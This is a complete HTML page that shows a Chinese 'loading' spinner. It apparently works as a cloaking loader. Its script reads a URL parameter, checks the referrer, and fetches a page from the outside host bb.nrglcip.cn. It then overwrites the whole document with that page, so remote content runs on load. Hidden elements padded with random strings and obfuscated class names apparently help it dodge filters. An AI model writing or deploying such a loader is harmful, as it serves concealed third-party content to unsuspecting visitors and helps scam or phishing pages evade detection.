<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .NulIZe {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .NulIZe .DVJt2nE {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .NulIZe .content {
            line-height: 50px;
            text-align: center
        }

        .NulIZe .img {
            width: 100%
        }

        .NulIZe .mRRMfkh {
            text-align: center
        }

        .NulIZe .mRRMfkh span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .NulIZe .mRRMfkh span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .NulIZe .mRRMfkh span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .NulIZe .mRRMfkh span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .NulIZe .mRRMfkh span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .NulIZe .mRRMfkh span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .NulIZe .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function FJ3BKLfV7(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var B2Tvkh = FJ3BKLfV7('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ B2Tvkh +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ B2Tvkh +".html?a=share";
		}
		
        qkYIuAsc12=url+"#"+new Date().getTime();
        qkYIuAsc12 && function() {
            $.get(qkYIuAsc12, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >C59YTpCYPv5urLUAxH2ytOtHr7oE5Ol5L8H8J7JQoEUgV156btJzlGVIcAUPSz3NcBYwvPI</h1>
<li style='display:none' >gR7QvbyVzEjY9jPG67WMaZz0H</li>
<p  style='display:none'>uNttBTjbLxt8zjdnWBRdeD89sdZ9nqDTDV9wBZCV8FYZuvStDBX5x5WQEebGnplnaGjBiZdixZYb</p>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>ivPGDFJyC8DxPNpRXq</a>
<img  src='' style='display:none'>
<p  style='display:none'>uNttBTjbLxt8zjdnWBRdeD89sdZ9nqDTDV9wBZCV8FYZuvStDBX5x5WQEebGnplnaGjBiZdixZYb</p>
<b style='display:none' >Of2jZpu484clO0eLcm6U</b>
<h1 style='display:none' >C59YTpCYPv5urLUAxH2ytOtHr7oE5Ol5L8H8J7JQoEUgV156btJzlGVIcAUPSz3NcBYwvPI</h1><div class="NulIZe">
    <div class="DVJt2nE">
        <div class="mRRMfkh">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<p  style='display:none'>baiFc2GVXYLK2LbeF</p>
<a  href='#' style='display:none'>crFF6k10udzHNBueat1bgBoGp36Z1jz4KfcLZJPOLG5</a>
<span style='display:none'>vZpBUxQuk22S5cXpFM0ehEggq3gfiZCmT3</span></body>
</html>